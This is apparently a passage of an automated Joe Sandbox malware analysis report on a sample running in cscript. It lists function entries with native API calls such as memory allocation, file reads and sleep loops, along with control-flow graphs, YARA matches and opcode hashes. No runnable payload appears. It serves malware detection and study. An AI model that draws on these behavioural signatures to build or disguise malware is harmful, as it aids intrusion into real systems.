                                                                            control_flow_graph 551 2dba53a-2dba53b 552 2dba53d-2dba53f 551->552 553 2dba501-2dba539 call 2dbaf60 551->553 555 2dba541-2dba556 552->555 556 2dba596-2dba5b9 call 2dbaf60 552->556 558 2dba55c-2dba57d NtAllocateVirtualMemory 555->558 559 2dba557 call 2dbaf60 555->559 559->558
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DA2D11,00002000,00003000,00000004), ref: 02DBA579
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 340c91485a91ffe9901b58f0b9a32dcfdfc1a96d9001fd14dcfed535198d9d5e
                                                                            • Instruction ID: 72b732e7b47fbf4db3dd80c9fd600cdef9916b0023c7adca29ee21130565a57d
                                                                            • Opcode Fuzzy Hash: 340c91485a91ffe9901b58f0b9a32dcfdfc1a96d9001fd14dcfed535198d9d5e
                                                                            • Instruction Fuzzy Hash: 902113B6200209ABCB18DF88DC95EEB77ADEF8C754F108559BE1997341C630E821CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(02DB4D72,5EB65239,FFFFFFFF,02DB4A31,?,?,02DB4D72,?,02DB4A31,FFFFFFFF,5EB65239,02DB4D72,?,00000000), ref: 02DBA455
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 7712c25b291b438d8d078cac26bc11ebe42db57706a92fec38714054b22c79e1
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: D0F0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241D630E811CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA40B Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(02DB4D72,5EB65239,FFFFFFFF,02DB4A31,?,?,02DB4D72,?,02DB4A31,FFFFFFFF,5EB65239,02DB4D72,?,00000000), ref: 02DBA455
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
                                                                            • Instruction ID: cccbcdab24c484a0add021d17146e8e2e4b986cc7108afce1f0ab78e242f96d2
                                                                            • Opcode Fuzzy Hash: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
                                                                            • Instruction Fuzzy Hash: D7F01DB2114049AFCB05DF98D890CEBB7ADEF8C214B15864DF95D97201C630E855CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DA2D11,00002000,00003000,00000004), ref: 02DBA579
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: aaf179cbca8cb56720a834a658258c9924263d7506188cff85cfc1f6bb3c16d0
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: 30F015B2200208ABCB14DF89CC80EEB77ADEF8C754F118148BE0997241C630F810CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(02DB4D50,?,?,02DB4D50,00000000,FFFFFFFF), ref: 02DBA4B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction ID: a53d56eb50bdf56b34c95eab200162e5486bb9313badeb4723810784db98a216
                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction Fuzzy Hash: 40D01276200214BBD710EB98CC45ED7775DEF48750F154455BA195B241C530F90086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 27134acff365695d075209aee1858a8858175338c4685cca0953b3acc910707b
                                                                            • Instruction ID: 366eefb4268e39e8daa9588e63d36c2598b59da2d964a0500c3f85b7d1538833
                                                                            • Opcode Fuzzy Hash: 27134acff365695d075209aee1858a8858175338c4685cca0953b3acc910707b
                                                                            • Instruction Fuzzy Hash: 4190023124140412F1007598940864600058BE0345F55D011BA029556EC665D9A26532
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 0ead0a9163d1bb1e9c7068934a2e8a28c2d28e7c3f7026d922775b65d327f35d
                                                                            • Instruction ID: 9cfe693bb111657ba4042c5323b0721fb405ff2e15e0ac0d342088f4f55868dc
                                                                            • Opcode Fuzzy Hash: 0ead0a9163d1bb1e9c7068934a2e8a28c2d28e7c3f7026d922775b65d327f35d
                                                                            • Instruction Fuzzy Hash: 6390023124148812F1107158C40474A00058BD0345F59C411B9429659D8695D9A27522
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 173d52420efec22c44746569e49e69f999ff690d817ba5936b76b0a2745b1a47
                                                                            • Instruction ID: 5c497a2a15b9f8c835b081524e585cd2c4d4edc183a67e0f9a64ddcadecea610
                                                                            • Opcode Fuzzy Hash: 173d52420efec22c44746569e49e69f999ff690d817ba5936b76b0a2745b1a47
                                                                            • Instruction Fuzzy Hash: 3B90023124140852F10071588404B4600058BE0345F55C016B5129655D8615D9627922
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1237e3156eef9e6e2d5556479c2e2116b5abc1949743817c8572dd03b0894513
                                                                            • Instruction ID: b0f3e998a62d79c8ab485f43b4e7ca26415b3bc492368e7c11a0d0d1074bf459
                                                                            • Opcode Fuzzy Hash: 1237e3156eef9e6e2d5556479c2e2116b5abc1949743817c8572dd03b0894513
                                                                            • Instruction Fuzzy Hash: B390023124140423F1117158850470700098BD0285F95C412B5429559D9656DA63A522
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 517c32dbd9f2970c540d213f8ac46e053d7d083825705e1279f7dc9fa6a6b631
                                                                            • Instruction ID: 5d829a4ec78ff21b09e34946d89b4544964cd0e930733215351131b215c3f71e
                                                                            • Opcode Fuzzy Hash: 517c32dbd9f2970c540d213f8ac46e053d7d083825705e1279f7dc9fa6a6b631
                                                                            • Instruction Fuzzy Hash: AA900231282441627545B158840450740069BE0285795C012B6419951C8526E967DA22
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: cbe92e8bb5f359d6ab4cb11b42fb23310fe903162701245242886a5bd7899725
                                                                            • Instruction ID: 66e0e8bd33967c7fe2d1b6fc1d03949afa15bf4bea1c440fb5a1da405c53276b
                                                                            • Opcode Fuzzy Hash: cbe92e8bb5f359d6ab4cb11b42fb23310fe903162701245242886a5bd7899725
                                                                            • Instruction Fuzzy Hash: 3690023925340012F1807158940860A00058BD1246F95D415B501A559CC915D97A5722
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4243f2c074ac7936515ea37f9bb97b9c9c2dd148d1e93768a4479bde272f2b6e
                                                                            • Instruction ID: 656279a3dfbf84c1543ec9cc6e603465e9e4649275b4659364ae300c29ee68c3
                                                                            • Opcode Fuzzy Hash: 4243f2c074ac7936515ea37f9bb97b9c9c2dd148d1e93768a4479bde272f2b6e
                                                                            • Instruction Fuzzy Hash: 4E90027124140412F1407158840474600058BD0345F55C011BA069555E8659DEE66A66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d9a6dc4ce7e332b6af166fcf6d6d0079b603879e948dbc9cef76e77181428c21
                                                                            • Instruction ID: 2e97777743a3546862a769d1909a240634143fb8ffc6595f9a64cdaaa8fa50da
                                                                            • Opcode Fuzzy Hash: d9a6dc4ce7e332b6af166fcf6d6d0079b603879e948dbc9cef76e77181428c21
                                                                            • Instruction Fuzzy Hash: 69900231251C0052F20075688C14B0700058BD0347F55C115B5159555CC915D9725922
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: dd8e9eb9745414f2fa61231e806d47fc092f703273f58162167e79e31b7b9ea6
                                                                            • Instruction ID: aff0e71b71ad0245736ae4a67984bb64da3fc9e941f4ed400a104f1d6e377045
                                                                            • Opcode Fuzzy Hash: dd8e9eb9745414f2fa61231e806d47fc092f703273f58162167e79e31b7b9ea6
                                                                            • Instruction Fuzzy Hash: 4B90027138140452F10071588414B060005CBE1345F55C015F6069555D8619DD636527
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3dcc03ce878f1b0776415eb385e2b3a5f4506c589ebc1225524a62179b8020f0
                                                                            • Instruction ID: 4a22a63013e8df2cb5132dc07d78c5b6764cfb11a83797a25efbddfb2bf01611
                                                                            • Opcode Fuzzy Hash: 3dcc03ce878f1b0776415eb385e2b3a5f4506c589ebc1225524a62179b8020f0
                                                                            • Instruction Fuzzy Hash: 0E900235251400132105B558470450700468BD5395355C021F601A551CD621D9725522
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a65b28a8328c6902d49a035fadeeb06b6352bef1a85c804edcc5ae5d42de67e0
                                                                            • Instruction ID: a8abe0eedd93489c12cbda1089d6fcb97ccbfb0a680535dcf884fbe3a3145f54
                                                                            • Opcode Fuzzy Hash: a65b28a8328c6902d49a035fadeeb06b6352bef1a85c804edcc5ae5d42de67e0
                                                                            • Instruction Fuzzy Hash: 0190023124140812F1807158840464A00058BD1345F95C015B502A655DCA15DB6A7BA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 96e9ab16e5554fb2bed908d9b592eeeb5a15d347d4bc5aeb98065ac2a4f87dc4
                                                                            • Instruction ID: b831de4a1b95b199eeb10b835597d313e11f66bd51e6093b84eac31773dfe546
                                                                            • Opcode Fuzzy Hash: 96e9ab16e5554fb2bed908d9b592eeeb5a15d347d4bc5aeb98065ac2a4f87dc4
                                                                            • Instruction Fuzzy Hash: 5790023124544852F14071588404A4600158BD0349F55C011B5069695D9625DE66BA62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b3bbf9d1fa881a6a3afffcb34676ae7ef43c3e0bf98939beaa532388b0c48baa
                                                                            • Instruction ID: 36c139e8f04599b2290db9a3ca84d9f334c864c69a5f3a2a67d772044ea8e9b5
                                                                            • Opcode Fuzzy Hash: b3bbf9d1fa881a6a3afffcb34676ae7ef43c3e0bf98939beaa532388b0c48baa
                                                                            • Instruction Fuzzy Hash: 8090027124240013610571588414616400A8BE0245B55C021F6019591DC525D9A26526
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 59b7ebcde7592f6173849a3f2f5ec23569ae6a3ba6c89e3326fb48b98ce773b4
                                                                            • Instruction ID: ea1dbf856635b1f8b5117dc20f6ba868c617fb5ca9265797374626283802df13
                                                                            • Opcode Fuzzy Hash: 59b7ebcde7592f6173849a3f2f5ec23569ae6a3ba6c89e3326fb48b98ce773b4
                                                                            • Instruction Fuzzy Hash: 8190023164550412F1007158851470610058BD0245F65C411B5429569D8795DA6269A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DB9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 243 2db9080-2db90c2 call 2dbbd40 246 2db90c8-2db9118 call 2dbbe10 call 2daacf0 call 2db4e50 243->246 247 2db919c-2db91a2 243->247 254 2db9120-2db9131 Sleep 246->254 255 2db9133-2db9139 254->255 256 2db9196-2db919a 254->256 257 2db913b-2db9161 call 2db8ca0 255->257 258 2db9163-2db9184 call 2db8eb0 255->258 256->247 256->254 262 2db9189-2db918c 257->262 258->262 262->256
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 02DB9128
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 0fdc58a123b94ef49e460aea890e5665add696cba25f5809d50b3b88e2771d27
                                                                            • Instruction ID: 9ded5982942ffdb03d155b1472df9b3aaa9e7525b23d1726b61589fc392d2527
                                                                            • Opcode Fuzzy Hash: 0fdc58a123b94ef49e460aea890e5665add696cba25f5809d50b3b88e2771d27
                                                                            • Instruction Fuzzy Hash: 52318EB6500244EBC725DF64C895FABB7B9EF48B00F00811DEA2A9B245D630BA50CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DB9076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 263 2db9076-2db90af 264 2db90bb-2db90c2 263->264 265 2db90b6 call 2dbbd40 263->265 266 2db90c8-2db9118 call 2dbbe10 call 2daacf0 call 2db4e50 264->266 267 2db919c-2db91a2 264->267 265->264 274 2db9120-2db9131 Sleep 266->274 275 2db9133-2db9139 274->275 276 2db9196-2db919a 274->276 277 2db913b-2db9161 call 2db8ca0 275->277 278 2db9163-2db9184 call 2db8eb0 275->278 276->267 276->274 282 2db9189-2db918c 277->282 278->282 282->276
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 02DB9128
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: fed8a1f8b7aeaab8dbde3f3a6b0c6300c56857273205f3f1c4ee83f43ad39af7
                                                                            • Instruction ID: 21936e9106443f380633c0862c6853733833be42bf802a75800d36cb2d720aa5
